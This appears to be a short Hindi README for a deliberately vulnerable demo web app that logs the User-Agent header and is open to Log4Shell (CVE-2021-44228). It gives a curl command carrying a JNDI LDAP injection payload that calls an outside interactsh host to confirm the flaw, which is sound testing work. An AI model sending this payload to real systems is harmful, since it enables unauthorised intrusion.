
सरल वेबऐप जो Log4Shell (CVE-2021-44228) के प्रति संवेदनशील है
एप्लिकेशन 'User-Agent' हेडर को लॉग करता है, इसलिए कोई भी curl और उदाहरण के लिए interactsh-service के साथ भेद्यता का परीक्षण कर सकता है:
curl -A '${jndi:ldap://interactsh-url/a}' http://target-service/
DNS इंटरैक्शन app.interactsh.com पर देखना चाहिए।
Docker हब का लिंक